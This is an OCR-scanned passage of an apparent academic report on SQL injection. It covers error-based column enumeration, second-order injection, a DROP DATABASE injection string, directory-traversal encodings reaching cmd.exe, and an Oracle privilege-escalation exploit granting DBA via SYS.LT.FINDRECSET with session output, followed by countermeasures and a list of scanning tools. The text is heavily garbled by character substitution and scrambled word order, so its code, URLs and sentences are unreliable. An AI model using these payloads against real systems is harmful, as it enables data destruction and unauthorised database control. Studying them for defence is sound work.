laos
and tl1e coπespo ndin g SQL qιιeιΎ woιιld be:
SELECT a,alD,a.aNarne FROM aιι th or a WI IERE a.aNational ity=ΊaΌs'
In a MS-SQL 2000 database this staternent would
the
caιιse
an
eιΤΟΙ' ιηessage becaιιse
of
ιιnclosed qιιotation rnaι-k:
Eπoι·Type:
Μ icrosoft
OLE
ΟΒ Ρι·ονideΓ fοι·
ODBC
DΓiνeι·s (Οχ8004 ΟΕ 14)
[Microsoft][ODBC SQL Seι·ver Driver][SQL Server]Unclosed qιιotation
ιηaι·k be foι-e
H1e cl1aι·acteι· stι·i11g' AND a.aiD=s.alD'.
/l101η ebase/pracιica Vindeχ.asp,
Α
aΓe
a. and s.
line 20
being ιιsed as table aliases
have been
ιι sed
Next step
fοΓ aη
'ΆΝ D
a.aID=s.aID in1plies that 2 tables
for this page and tl1at aID defιnes tl1e Γelationship between the tables.
attackel' woιιld be tl1e finding of the actιιal
na1ηes
T11is kind of job can be perfoι·med ιis ing the paiameters GROUP
or tl1e tables ιιsed .
ΒΥ
or HAVfNG
e.g.
l1ttp://stιιaι-t/l10111ebase/pι-actical/index.asp?sto1Ύ=3%20HA VING%201 =l--
%20 is tl1e Unicode cl1aι·acter of space, -- is used for comn1enting out anytl1ing
appenιi ed
to tl1e SQL stateιηent fωιη tl1is point and
tΓanslated ίηtο
foι·wa!'d.
the following SQL statement:
SELECT s.s1D ,s.title, s.blu ι·b,s.stoιΎ ,a.aNan1e FROM
sl0=3
This way the URL is
ΗΑ VJNG
stοιΎ
s, aιιthOI' a WH ERE
1=1-- AND a.aID=s.aID
Staten1e11t wi ll cause the following eποΓ:
ΕηΌΙ'
Type:
Microsort OLE 013 Providcr fοι· ODBC Driveι-s (Οχ80040Ε14)
[Micι-osof't][ODBC
SQL Seινeι·
Dι·iveι·][SQL Serveι·]Colι1mr1
sclect list because ίι is ηοι contained in an aggregate
GrωυΡ ΒΥ c la ιιse.
/1101ηebase/practicaVindex .asp, Ιίι1e
15
17
fιιnction
's.slD' is i11valid
and tl1ere is 110
ίη
tl1e
By tl1e eΙTor tl1e attacker gets tl1e
ίη
infonηation
tl1at a colun1n
naιηed
s.sl D is contained
tl1e database.
This eιτοι- l1as aι·isen
becaιιse
used, groιιping all tl1e
fιelds ιιntil
tίe lds.
of the
ιιse
of HAVING - a GROUP
ΒΥ,
shall also be
Tl1e only tl1ing tl1e attackeι· shall do is look aαoss tl1e
tl1e eιτοr ceases to ex ist. This is l1ow tl'ιis coυld be peι·foπηed:
htt r://s1 ω.11·υl101η~bas~/1πn~ti ca 1/i nclcλ .a~φ·.>sιory- 3%20~ l'Otl ρ~'~20l)ynιό20s. sl υ~'ό20h~ι
νiιψ%20J
= J--
in wl1ich case the s.sID
fιeld
is
inseι-ted
within tl1e URL, whicl1 will cause the next
eιτοι·.
Ειτοι· Type:
Micι·osoft
OLE DB
(Micι·osoft][ODBC
select
ΒΥ
lίst bccaιιse
l)ι·ovideι· fοι·
ODBC Dι·iveι·s (Οχ80040ΕΙ4)
SQL Seι·ver Driνer][SQL Server]Colιιrηn 's.title' is invalid in tl1e
it is not contai11ed i11 eitl1 eι· an aggι·cgate
fιιnction ΟΓ
tl1e GROUP
clause.
/hoιη ebase/pι·actica l /i11dex.asp,
li11e 20
by which the attacker is in-foι·med that next to s.sID is the column s. title. This piece
of infoι-mation can now be inseι·ted
ίη
tl1e URL again:
11ttp;//st ιιaι·ι/J1on1cl)ί\SC/ρn1cl ic:1J /j ιι dι•x . asp'?sloιγ =3%20gl'Otιp%2()by%20s . s !1) ,S. Iί [ 1~
~ί,2οtι<Ίνi ng%20 l-
l-
whicl1 once again pωduces an "infoπηative" eιτοι·:
Micωsoft OLE
DB Provider fo r ODBC Drivers (Οχ80040ΕΙ4)
[Micι·osoft][ODBC
selecι Ιist becaιιse ίι
ΒΥ
SQL Seινeι· Dι·iveι·)[SQL Serveι·]Colιιιηn 's.blιιι·b' is invalid ίι1 tl1e
is not co111ained ί11 eitl1er a11 aggι·egare Γιιηctίοη ο r rl1e GROUP
clause.
/l10111ebase/pn1ct ical/i11deχ.as p , li11e 20
Wl1ich tl1en
ι·eveal s
tl1e next's co luιηn
naιηe
and so οη and so
t'oι·th.
3.1.2 Acquiring Further Access
Usually attackeΓs taι-geting to tl1e database paΓt do stop in ι-ead ing aηd/οι- alteι·ing tl1e
database of a netwoΓk, bιιt ιιsιιally tιΎ to gain further access to it.
Having access οη the database paι·t gives easy access on tl1e seι·veι· tl1is database is
nιnning on. Attackers can either· ιιse the command sl1ell to ι-uη con1mands on the
seι-veι· οι- tl1e ι-egi st ιΎ editoι- to i-ead οι· alteι- tl1e ΓegistιΎ keys οη tl1e ser·veι·. Given tl1e
fact ιl1at the opeι·ating system οΓ the seι·νeΓ is usιιally known tl1is gives a gΓeat poweι-
18
on the attacker to do almost what l1e/she wanιs to tl1e seινeΓ. Sοιηe ot l1eΓ kinds of
ιηίsιιse coιιld be the nιnning of qιιeι·ies to otheι· seΓveι·s οι· the execιιιion of
pιΌceduΓes stoι·ed ίη tl1c seινeΓ itsclf.
Mostly dangeι·ous is tl1e fact t\1at ActiveX applications can be cι-eated to ιηakc
aιιtomatic scΓipts which will be tl1en execιιted fιΌm tl1e seινeΓ. This can be peι·foι·med
by the ιιse ofOACreate, sp_OAMethod and sp_OAGetPropeΓty systen1 stoι·ed
pωcedιιι·es. Of cοιιΓse cι·eation/deletion/editing of fi]es οη tJ1e seΓνcι· is one οΓ tl1e
ιηοsι con1111on tl1ings to be done in sιιch attacks.
3.1.3 Stoι-ed Pωceduι·es
T11e use of stoι·ed pIOceduΓes ,
peι·Γοι·m.
qιιcιΎ
ιιsua lly ιηakes
SQL injection attacks 1110Γe difficult to
This depends of couΓse οη the implen1entation of the scι·ipting.
wit/1
paι·aιηeteΓs,
and taking ca ι·e of tl1e secuΓity
CΓeaιing
ofΊ l1e υseι· sιιpplied
a
value
assigning to those paι-an1eteι·s, it is difficult to inject so ιη eι l1ing in the database ιhcιι
coιι ld
be execιιted
ίη
ι·esu lts
(witl1 Jin1ited
tl1e contΙΌ I plane. The only possibi lity tl1en
fοι·
an SQL injection
thougl1) coιιld be tl1e n1anipιιlation of tl1e ηοη data paτts.
3.1.4 Second Ordeι- SQL Injection
Α Ιίηe off defence against web application inpιιt attacks is the limitation of tl1e lengt/1
of the
inpιιt
otheΓ
"syntax
be
tl1at
νeιΎ ιηιιcl1
coιιld
be possibly
oΓiented" sιιch
sιιbιηitted
in a
qιιeιΎ.
as limiting of tl1e single
This
liιηitation
along witl1
qιιote cl1aΓacteΓ ιιsage
eff'ective by tl1emselves, as tl1ere aΓe ways
fοι·
an
attackeΓ
to
can not
oveι·come
those obstacles. If the ιιseι· inpιιt is being Γeu sed also elsewheΓe ίη t11e application
tl1en the injection danger ι·emains. This kind of injection is called second οι-deΓ
injection.
Thcι·etoΓe
database
paι·t
Ι in1iting anιi
ι-equiι·ed
inpιιt
tl1en
all tl1e "syntax
o ι-iented ιηeasιιι·es
shall be applied also to the application
that
aΓe
paΓt
being used
such as
inpιιt
fοι·
t11e
length
single qιιotes ιιsage lin1iting. fn case mιιltiple οι· long ιιseι- inpιιt is to
ιhe dangeι·
of input injection is
pι·esent
as an
attackeι· ιηay
exploit tl1e
data lengtl1 available to wΓite injection code.
As an example of a sigle quote limiteι· tl1e VBSαipt Ί·ep lace'(3] can be ιιsed tοΓ
sanitising
fιιnction
ίηpιιt
data:
escape(
inpυt
= ι·eplace(input,
escaρe = inpιιt
ίι1pιιt
)
11111
,
""")
end f ιιnction
19
3. 1.5 Weak input validation
Ιη a database exρecting ηιιιηeΓica l values as
' ; DROP
ΟΑ TABASE
ίηpιιt sιιppose
the following
inpιιt:
pubs --
The dynamic SQL staten1ent executed could lookl like tl1is:
SqlDataAdaptel' n1yComn1and
"SELECT au_lnan1e,
= new SqlDataAdapteΓ(
au_fna ιη e
FROM
auιl10Γs
WHERE au_id
= "' +
SSN.Text + ""', n1yC01111ectio11);
T11e developeι·'s intention was that when tl1e codc
geneι·ates
tl1e
followίng stateιηent
ιυηs,
it
inseι·ts
tl1e ιιseΓ' s input and
in SQL.
SELECT aιι_lname, au_fnaιηe FROM autl10Γs WHERE au_id
= ' 123-12-
1234'
lnstead, the code gener·ates the following querγ:
SELECT au- lname, aιι- fnan1c FROM aυthoΓs WHERE au- id
ΟΑ TABASE pιιbs --'
Ιη
= "·'
DROP
tl1is case, the ' (single qιιotation 111ark) cl1aΓacte1· tl1at starts the input teι·n1inates the
cuιτent stΓing liteι·al ίn
following
paΓsed
the SQL staten1ent. It closes the cιιιτent statement only ί f the
token does not make sense as a continιιation of' the cιιΙΤeηt
statement, bιιt does ιηake sense as the stal't of a new statement. As a resιιlt, the
opening single qιιotation maJ'k cl1aJ'acter of the inpιιt Γesults in tl1e following
stateιηent.
SELECT aιι_lname, au_fname FROM aιιthoΓs WHERE aιι_ίd = "
20
The semicolon suggests t11at t11is
ιη alίcίοιιs
Γollowed
by tlie
ΟΑ TABASE pυbs
necessa ι·ity ι·equi ι·ed
The sen1icolon is not
dependent on
SQL
the e11d of tl1e statement,
SQL code bellow:
; DROP
cl1aι·acteΓS
ιs
vendo ι· οι·
cause a SQL
sepaΓate
SQL
s tateιηents .
in1plementation. Finally, the -- (double dash)
is a SQL con1n1ent tl1at tells SQL to
ignoΓes
to
i gnoΓe
t11e closing ' (single quotation maJ·k)
T11is is
seqιιe11 ce
of
tl1e rest of tl1e text. Jn this case,
cl1aι·acteΓ,
whicl1
woιιld o tl1eΓw i se
p a ι·se r eιτοι-.
3. 1.6 Privileges when connecting to databιιses
Dιι c
to the hieΓa Γchica l
gΓanted
inl1eΓitance
to othe ι· ω l es, a ιι se Γ could
0Γac le tl1eΓe
MicΓosoft' s
is no
speciίic
inl1 eι·it
ι·o l es,
wl1ich can in
privilcges t11ey sl1oιιld
n eνc Γ
tuιη
be
be gΓan ted. Jn
DENY state ιηent ίη tl1e basic pΓίv ilege comιηands.
SQL SeΓver l1as the abi lity to specifically DENY a Role Ο Γ a privilcge to
a ιιsc ι· bιιt Oι·acle does not.
secuι·ity at
of pΓiνileges thωugh
0Γacle's
database pι·ivi lege stl'UctιιΓe was designed
befoΓe
tl1e database was of gΓeat concern. 1t is essential to enu111eΓate tl1e
pΓiνileges of al l ιιseΓS and Roles paying special attention to the PUBLIC ΓOle wl1ich
has many object pΓivίleges granted to it wl1ich aι·e not always
"ΑΝ Υ"
ΓequiΓed.
privileges are to be avoided when possίbl e; such as CREATE ΑΝΥ
PROCEDURE wl1ich gives tl1e ιιseι· tl1e abi lity to create a pι·oceduι·e in
anothcΓ ιι seι" s
schema. PLSQL pΓOcedιιι·es, by defaυlt, Γun with the pΓίνileges of the schema within
whicl1 tl1ey aΓe cι·eated 110 n1atteΓ wl10 invokes tl1e pΓOcedω·e. In ΟΓdeΓ tοΓ a PLSQL
package to ηιη with invokeι·s rights AUTHID CU RRENT_USER has to be explicitly
wι·itten
into the ρackage.
Bellow an exanψle of ltfindι-ecset.sq l LT.FINDRECSET exploit and tίιnction can be
foιιnd:
CONNECT ΜΑΝΠl(ίΕR@ΟΙιcι
SET SF.RVEROUTPUT ΟΝ
Cf{ EΛTE OR R[l)LΛCE l' UNCTION MYFUNC rι ETURN VARCI 1Af{2 AUTHID CURR F.NT_USΓ:R IS
Ι'l{Α(ίΜΛ ΛUTONOMOUS TJ{ANSΛCTΙON:
13ECJIN
-
DRMS_OUTl'UT.PUT_LINE('l11 fι111cιio11 .. .');
,
εχι:c:υΤΕ ΙΜΜ ΕDΙΛΤΕ 'GRANT DΒΛ ΤΟ ΜΑΝ :
CΟΜΜΙΤ;
21
ΓH:TURN 'STI{';
END;
Ι
Α
low pΓi vileged
becaιιse
useΓ ί s
abl e to grant themselves DΒΛ p ι·i v i l eges . Thi s can be done
tl1e SYS.LT.FIN DRECSET pιΌcedιιre does
nο ι ρaι·se οιιt ιι seΓ i ιψutted
SQL.
Εχ ι;c SYS. l .T. 17JN Dl{ I CSΙ:T('AΛ .ΛA''llMΛN.MYl'UNC)--','Bl31313');
SQL> sclccι •
liΌ111
v$vcrsio11;
13ΛΝΝΕR
Onιcle Daιabasc 1Og E11tcrprisc ι:Ξdίιίοι1 l{clcas.: 10.1 .0.2.Ο - 64bi
f>USQL l{clcnsc Ι 0. 1.0.2.0 - 1>rodιιctio11
cο ιυ: 10. 1.0.2.0
1>rυι/ ιιcιίοι1
TNS for Solaris: Vcrsio11 Ι 0.1.0.2.0 - J>rodιιcιioιi
NLSRTL Versioιι 10.1.0.2.0 - 1>rοdιιcιίοι1
SQI.> co1111 ΜΛΝ/tίgerιίι)ΩπιgοΙ :
Co1111ccιcd.
SQI > SET SEl{VEROUTl'UT ΟΝ
CΙΗΞΛΤΕ
OR
Rt:Ι>LAcε
l'UNCT!ON MYl'UNC RJ::TURN VARCllAR2 AUT! llD CURRl::NT_USEI{ IS
l ' l{ ΛGMA Λ UTONOM OUS Ti{ANSAC.TION:
BF.CilN
l)BMS OUTl'UT.l'UT Ι.ΙΝΕ(Ίn fu11ctioι1.'):
εχεcϋτε ΙΜΜΕDΙΑΤΕ 'Ul{ΛNT Dl3A ΤΟ ΜΑΝ':
COMMIT;
ΙωΤU Ι{ Ν
'STI{';
F.NI);
Ι
SQI>
2 3 4 5 6 7 8 9
f'ι111 cti o11 crC<llCιl .
SQL> sclecι • fro111 uscr_rolc_J>rivs:
GΙ{ΑΝΤΕο_1ωιΕ
USEl{NAME
ΜΑΝ
ΜΛΝ
CΟΝΝΕιΤ
/HΞSOUl{Ci.Ξ
ADM DL:FOS_
ΝΟ YESNO
ΝΟ vεs ΝΟ
SQI,> Ι:ΞΧΕC SYS.LT.l'INDRICSET('AA.AA"l/MAN.MYFUNC)--','131313B');
111 Γι111cιίο11.
Λ Α.ΛΛSΤI{
f> Ι JSQL ρroccdιιrc sιιccessΓιi lly coιnρlctcd.
SQL.> scl ccι •
Ιrοι11 ιιscr_rolc_J1rivs
2 :
Gl{ΛNTED_ιωιr:
USEl{NΛMI::
ΛDΜ DEFOS_
--..................................................... ---···------------·-··-··----- ...... ...... --Μ ΛΝ
ΜΛΝ
CONNF.CT
ΜΛΝ
RESOURCE
DBA
ΝΟ YES ΝΟ
Ν Ο YES ΝΟ
ΝΟ YESNO
ΤΙ1 e pωcedυΓe SYS.LT.FINDRECSET ιυηs witl1 DefιneΓ pl'ivil eges tl1eι·efoι·e code
ηιη in thi s ρackage is nιnning with tl1e pΓiνileges of the accounι tl1at owns the
pc1ckage. Α cοιηJηοn ιηethod to get contωl of ~ιn 0t"acle database is to exploit a wcak
passwoι·d accoυnt and escalate ρι·i νilege to DBA νίa PLSQL injections.
22
Dynaιnic queIΎ
3.1.7
Stoι·ed proceduΓes aΓe
interfaces
used as a data interface between the u se Γ input and the SQL
database. This way tl1e data tl1at ι·each the database aι·e being "checked"
validity and access
been
fοΓ
s tnιctιιι·e
Γi g l1ts
a\'e being adjusted.
a lor1g tin1e tl1e most effιcient way
fοΓ
giving
inpιιt
is called ''locked down database" In this case tl1e
access tl1e database l1aving
(and tl1e length
tl1is to
StoΓed pιΌceduΓes
wo ι·k ,
soιηet im es)
tl1e sto Γed
befoΓehand
ot' the
validated tJ1e
inpιit
pΙΌced ω·es
ηοι
Ιη
be
tl1eι·e
n1etl1odology l1as
to databases. Tl1is kind of
s toι·ed pΓocedιιΓes
inpυt, pΙΌvided
can only
that tl1e type
aJlows tl1is validation to be fιιnctionaJ.
Fοι·
and the database tables need to have tl1e saιηe
type of' access 1·igl1ts οη tl1e database via oν.ιnerS'hiρ cfιaίning.
is not a ρι·οccdιιι·e i.e.
fοι· theiι
is ηο owneΓ defined.
Ιη
Howeveι·
dyna111 ic SQL
tl1is case tl1e owneι·sh i p cl1ain can
fιιnctional.
SQL 2005 this issue is resolved with tJ1e use of a ceι·tiΓιcate to sign a pΙΌcedure
ιιsing
dynan1ica SQL as a process. This ceΓtificate is assigned to a useι· maki.ng again
tl1e owneι·sl1ip chain possible and functional. Another way to ovcrcome that obstacle
is making tl1e EXECUTE AS clause have ιιser peι·n1issions which
theι·efoΓe
can be
chaiηed.
Bellow tl1cι·e aι·e two examples οη l1ow to wΓite a stoι·ed
ηaπι e
pιΌcedιιι·e
that takes a table
as its ίηpιιt(ΙΟJ:
Cl{EΛTE J>Ιωc.:ΙωU ιη~
gc11cn1J_selcc11 @tb l narηe sysrntrne,
@kcy vaι·cl1ar( 10) AS
υα: ι.Λιω ftEsι1 ι 11ν<tl'cΙΗιι·ι4οοο)
SEIH..: T f!!,s<ιl = ' SF.ιECT col Ι. co12, col3 '+
' πωΜ dbo.' + φ101c11ame(@tbl11aιηe) +
' WI Ι ΕΙω keycol =@key'
EXL:.C ψ_eχecutesql r&sql, N'lί!,,kC)' varcl1ar( IO)'. @kcy
ι:ιωΛΤΕ J>ιωcι;υ υ ι{ Ε
gcncral_select2 @tblnaιne nvarcl1ar( 127).
l(tkey varchar( 10) ΛS
LαEC('SE l .ECTcol I. col2. col3
ι: ιωιvι · + ~1blr1 ;1111c + ·
WI Ι ΕΙω kcycol = "' +@key + "") [ 161
In thcse examples table nan1es are given as parameteΓs, wl1icl1 is something to avoid
in
geneι·a l . Thoυgl1
aικi ιl1i s cο ιιlιi
the
Γιι·st procedιιι·e
is
gΓanted
dbo
Γight s,
bc a pι·obleιη in tl1e case of dynan1ic SQL.
23
the second one does not
3.1.8 Canonicalisation eποι-s
Canonί(;afi.'iation is conveι·ting inpιιt chaι·acteΓs into
!1exadeci ιη al ΟΓ
Unicode. This
fοηη
is called
in ASCJI
1
Yo2f
ίη
hexadecimal
%2f οι· 1Voc0% af
ίη
Unicode
set of characters
cases
ίs
fοιη1s
tl1at can be ιιsed
fοι·
it's
are tl1e fo llowing
\
Α
i.e. ASCI,
canonicalfoι-n1.
E.g. fοι· ι he \ (backslash) tl1e 3 diffeΓent canonjcal
ι·eρι·esentation
theiι· standaΓd fοηη
usιιally
suspect
fοι· SQL
injection and blocked
ίη
n1ost of the
URL DiΓec toIΎ Tι·ave ι·sa l .. / Αη exaιnple coιιld be thc 1-'ollowing:
lι ttp :// 1 0. 1 54 .1 93. 2 1 9/m a n/../../../ ..Λν inn t/systeιn 32/cιηd .exc?/c+dir
T11is URL woul<I bc blocked by a server because ίt has ../ cha racters but the
following form could be a ll o,νed
ίf
no canonicalization convertion is made
bcforc filterin g.
f1ttp: // J 0. J54. 193.2 19/man/ .. %1c0% af·.. %c0 % ~\ f'.. 1 V<)cO %a f". ./\V ί11nt/systeιn 32/cιnd .
cxe?/c+dir
Otl1eΓ
Canonical
fοπη
injection possible chaι·acteι·s can be found
ίη
the tables bellow:
Table 11-1 : The Different Types of Overlong UΠ-8 Characters Possίble for Ι and \
Escape
Comment
%c0%af
2-byte overlong UTF-8 escape
%e0%80%af
3-byte overlong UTF-8 escape
%252f
1 Double-escape;
%25 is an escaped % character
--~--·-
%%35c
Oouble-escape; %35 is a11 escaped 5 character
%25%35%63
Oouble-escape, ~vhere eνery character in %5c is escaped
%%35%63
%. theΓι escaped 5 and escaped c
%255c
Escape %, then 5c
%u005c
2-byte Unicode escape
ι ι ΊJ
24
Table 11-1 : The Different Types of Overlong UTF-8 Characters Possible for Ι and \
1
Escape
Comment
%c0%af
2-byte
o/oe0%80o/oaf
3-byte overlong UTF-8 escape
%252f
Double-escape; %25 is an escaped % character
overloπg
UTF-8 escape
%%35c
' Double-escape; %35 is an escaped 5 character
%25%35%63
. Oouble-escape, wl1ere every character in %5c ίs escaped
%%35%63
%, the11 escaped 5 and escaped c
%255c
Escape %, the11 5c
%u005c
2-byte U11icode escape
[\ 7]
3. 1.9 Di ITerences between databases
Diffel'ences between diffeι·ent databases in ι·egaΓd wiιh chal'actel's inteφι·etation and
runcιions suppoι·ted:
Some differences
MS SQL
T-SQL
Concaιenaιe
1 ' + '1
Access
concat ("
""&ιι ιι
", ιι ••)
Strings
Null
replace
MySQL
Oracte
PL/SQL
DB2
Postgres
PL/pgSQL
'11 '
1111+1111
, Ί /',
1
1
Ifnull()
Iff(Isnull())
Ifnull()
If null()
COALESCE()
Position CHARINDEX
LOCATE()
InStr()
InStr()
InStr()
TEXTPOS()
Op Sys xp_cmdshell
setect into
outfile Ι
dumpfile
#date#
utf_file
import
from
export to
Call
Νο
Νο
Νο
Yes
Yes
Isnull()
interaction
Cast
Yes
OWASP
[2 1J
25
f')
Η
More differences...
MSSQL
MySQL
Access
Oracle
DB2
Postgres
UNION
Υ
Υ
Υ
Υ
Υ
Υ
Subselects
Υ
4.0
4.1
Ν
Υ
Υ
Υ
Batch Queries
Υ
Ν*
Ν
Ν
Ν
γ
Default stored
procedures
Many
Ν
Ν
Many
Ν
Ν
Linking DBs
γ
γ
Ν
Υ
Υ
Ν
Ν
Υ
OWASP {;)
(2 1]
26
J~
4
TOOLS FOR ATTACKS IMPLEMENTATION
Manυal
testi11g
fοι·
SQL
υsed
to be the only way to determine the vulnel'ability Ievel
of a database. Testing took great
effoι-t
parameteι·
Ιη
eποι·
on tl1is kind of testing.
n1essages
exploίting
to be
peι'fonηed
gιιess ί ng
on the database
possible weaknesses, knowing the code which l1ad been
Γesιι lt,
big coding
pι-ioΓity.
eιτ01·s
Since then
peΓfonηing
SQL
to be
aιιacks ίη
tester to
database
paΓt.
ρcι'fοrιη.
impleιη ented.
st nιctures
and
This l1ad as a
as tl1e functionality was not always the
fιrs ι
SQL injection tools have been developed,
a syste1ηatic way, cl1ecking not only the newly developed
tl1Γeats bυt 'Ίegacy" th Γeats
n1anιιal
oveΓsee11
ιηaι1y aυtomated
weΓe stnιcking eΙTors ν ί cι
n1any cases testel'S
or through wild
and luck was always a
as well,
ίη
a
bιι lk
that
woιι l d
take too
ιηucl1 effo ι·t fοι·
a
Those scripts can test both the web application and tl1c
Usually such tools
ρeι·fοιη1
a fi1·st level of
l1aΓmless
testing
cι·eating
cιttacks
tl1at wi ll not destl'Oy anything οη tl1e system, pΙΌνίdίng the user with input to
coιτect
"easy to see" probleιηs.
Γ-οι· cxaιηplc,
a sinψle qιιeιγ οη a telephone diι·ectoιΎ. Havi ng tl1e URL lonηat:
Ι11ω://ιηysiιe.coιn/diι-ecto1-y.asp?lastnaιne=paι·askevakis&fiι·st11aιne=n1anolis
Tl1is Uf~L coιιld Iead ιο the SQL code execuιion:
SELECT ρl1onc
1-ϊ~ΩΜ cl iι·ccto ιΎ
WHEf{t lastnaιηe = 'paι-askcvHkis' anιl liι·st11nιne= 'n1a11olis'
Α
slightly nltcι·ed vcι·sioι1 of the "corrcct'' URL could be the following:
hιιρ://ιηvsite.coιη/diΓectorv.asp?Iastnan1e=ρa1·askevakis&lirstnaιηe=ιnanolis'+ΛND+
(sclect Ι-co ιιnt(*)+l'iυn1+fHke)+%3eO+O R+' J '%3ιi' 1
lc<1ding ιο thc cxccιιtion οΓ tl1e SQL codc beellow:
.
~ ι ι .Εt'Ί 11Ιω11.:
Ι ·Ί~υtνl dir.:cωrv
\VI ΙLΙΗ: lίl\!11ίΙ;Ι1.: = 'parnsk.:ν:ιkίs' :ι11d fίr.;t11:11ηc='11111nolis'
27
ΛΝI) (s~Ιcι·ι \.'ΟUιΗ(*) Ι'ωιη
0 1{
li1J..c)-• Ο
Ί'=' 1'
URι-Unicocle va ι·inbles aι·c
111 this cxampl c tl1c
i.c. %Jd to" '='.
Saιηpl in g aιιacks
replaced by
ιΙ1eiΓ
ASCll
cψ1i vale11ιs
ιl1e
one above can not pl'Oνicie a systeιnatί c and ίιιll
attacks nιnnin g diffcι·ent ρattcιη s οΓ
pΙΌviding cithe ι· info πηation tl1at a vιιlnenιbility is cx isting οι·
likc
Γuncιiontllity scc ιιι·ing so lιιtίon. Aιιton1ated
attacks sl1al l bc ηιn.
cvc11 san itizatio11 solιιtίo11s.
4.1 Tools classification
Database attack tools can be classified depending on tl1e use indented
Vυl11erabίlity
•
Web Application
•
ΒίnaιΎ
•
Web Services Too ls
•
Static Analysis Secιιrity Tools
•
Netwoι·k
fοι·
as:
Tools
Analysis Tools
Sca11ner Tools
[24]
Depending οη
app Γoacl1
and
fιιnctiona li ty:
• Life Cycle Pι·ocess ( Γeqιιirements, design)
• Αιιtοιηatίοη ( ιηanual, seιηί, aιιton1atic)
• Λppl'Oacl1 (pΓeclιιde, dctect, n1itigate, ι·eact, appι-aise)
• Other (pΓice, platform, languages, ... )
4.2 Evaluating the Results
Ι 11 ι\1c cxHnφle ιιscd bef(H·c:
l1ttp://1ηysite.coιη/di1·ec!o1Ύ.asp?l astnaιne=ρan1skevakis&fii-st11aιηe=n1anolis'+ΛND+
(sclect+coι111t(*)+fl'Oιη+ fake)+%3e0+0R+' 1'%3d' 1
Thc web rφplication slH1 ll 1·en1ove tl1e single quotes. ΙΓ tl1is is not do11e ιlιeη tl1e
cl aιat')<ιse νν ί!Ι eχecιιte
tl1e SQL coιηιηancls too togetl1eΓ witl1 tl1is queIΎ.
1ι· tl1is is clone tl1c11 an eποι· n1essage will appear:
Ι ·: 1Το ι-: Νο ιιscΓ Γοιι11ιi
witl1
naιnc
n1n11oli s+ ΛN D +(sc lcct+cou 1H(*)+ f1Όιη + fal.-.e)+%JeO+OI~+ 1%3d Ι ρaΓa s kevn l<is!
28
1t' ιl1e
sωtcn1e11t
ιηay <ιp11ca.-:
is passed
tοι· eχecιιtion tυ
011e dctailed, passing
Microson ο ιΕ l)J)
the SQL then
infoπnation
1>1·0,'ίιlcι· Γσr oυuc l)ri\"CΓS
crror '80040c37'
one gcncric like:
500
Ιι11 eι1111Ι Seινeι· ~rι·οι·
s tatcιncnts ιnean
s toι·eιi prυcedu.-es ι.ιι·c
that an SQL vulncι·ability exists 011 the application
not bcing ιιsed 011 tl1c SQL ρaι·ι.
•
DatavalidHtion
•
Liιηitation
οΓ aJI ίιφιιt, coπtaining
qιιeιΎ
that
to l1e taJ<en:
data type and lengtl1.
tl1c bette1-. 1Γ tl1e accoιιnt
docsn't l1avc peιη1issio11 to executc
Use ston.~d
C:oιιnteπηeasuι·es
paι·t οι·
of accoιιnt peπηi ssion s execιιting dntab<1se qιιeι·ies. ΊΊ1e Jess
ρι·ί vi lcgcd ιι scl' accoι1nts aι·c
•
11<11nc 'H1kc'.
li11c 29
Ληd
Botl1
kind of eιτο1· 1ηessHges
011 tl1c attackcι· Jil\e:
(Micro~o11 JJ Ol)IJ(; Sί,)I , Sι.:ι·,•cι· υri νcΓ(JSί,)L Sc:rνι:ι· JΙ11 vcι li<I ob.iccι
/ιli rι:cιοΓ)'.cι~ρ.
tννο
pl'Oceduι·e inteι·faces.
ίι
ιιsed
to cχcctιtc thc
it wi ll 11ot s ιιccecιl!
to act bctννeen tl1e applicatio11 and tl1e
SQLpίΙ Ι't.
Vulnerability scanning tools
Tl1eι·e aι·c many tools ιιsed Γο.- SQL in.jection attacks eithe.- developed fol' hacking
4.3
ριιφοses οι· fοι· secuι·iιy evalιιation puφoses,
fΓcewa1·e.
SQL injection i ssιιe has been addι·essed by many majoι· software
conψanies,
( ΙΒΜ)
wl1ich are eit\1eΓ coιηn1el'cial ΟΙ'
wl1ich have pl'Oνided solιιtions like: AppScan ΟΕ by Watcl1fiΓe, Jnc.
(U RL:
νvww.ibn1.com/software/awdtool s/appscan/),
Hailstorm
νvww.ιηίCl'osoft.coιη/p.-csspass/Γeatιι Γes/200 Ι /η1a ι·Ο1 /03 -1911ailstoιη1.111spx
(U RL:_w3Hf'.soι11·ccfoι·ge.ncύ), GΓabbeι·
ΡΗι·οs
(URL:
SΡΙ
), WJAr
(URL: www. Γgaιιcl1 e1-.info/l)cta/gl'abbe1· ),
(URL: www.pal'Ospωxy.01-g/fιιnctio11s.shtιηl ),
N-Stealth Secιιι·ity Scannel'
Ι11ιρ;/Λ.vww.11 s talkeι-.coιη/eng/p1Όdιιcts/nstealtlΊ/),
Vιιlne1·ability
(URL:
Acunetix
Ltd.'s
Web
Scanner (URL: http://www.acιιnetix.com/vυlneι·Hbility-scanneι"l) and
Dynan1ics
(ΗΡ)
Weblnspcct
http://'Λ'\.Y\ν.s pidynHmics.coιη/pl'OductsΛνcbinspect/indeχ.html). Fι-ee
(URι:
tools like Wikto
(URL: l1ttp: //wνvw.scnsepost.coιη/ι·eseaι·cl1/wikto/)can often fιnd t\1ese vιιlne!'abilities
29
as well. Anotl1er tool is SJeutl1 (URL: J1ttp://sandspt'ite.con1/Sleuth/ιiownloaιi.11t111!)
cquipped witJ1 an SQL injection pJιιg-in.
WebGoat[27] is a deJibeι·ately insecιιι·e J2EE web application ιηaintained by
OWASP designed to teacl1 web applicatio11 secιιι·ity lessons. ln eacl1 lesson, useΓS
n1ust deιηonstrate theiΓ ιιndeι·standing of a secuΓity issue by exploiting a ι·eal
vulneι·ability ί11
tl1e WcbGoat aρρlication.
Conimon too/ f eat ιιre!;:
4.4
•
Aιιtorηatic
•
SQL i11_jection and
•
Visual macro ι·ecol'der makes testing web foιms and password pΓotected al'eas
JavaScript analyze!' allowing
CΓoss
fοι· secιιrity
testing
site SCΓipting testing
easy
•
RepoΓting
faci lities
•
Aιιtomatic
application
•
Flash content, SOAP and AJAX context analysers.
•
Autl1e11tication and access contJ'OI weaknesses, Path
eηΌι·
VISA PCI coιηpliance repo11s
langιιage
detection
manipιιlation, Ιηψι-ορer
l1a11dli11g
Detection of tl1ese
iιηpoι·tant ιο
inclιιding
web
vulneι·abi l ities ΓequiΓes
vιιlneι·ability
a sophisticated detection engine. What is
scanning is not thc
ηιιmbeι·
of attacks that a
scanneι
can dctect, but the conψlexity and tl101Όιιghness with the scanneΓ laιιnches SQL
injectίon, CJΌss
Site
SCl'ίptίng
a11d
otheι·
attacks.
Anotl1eΓ
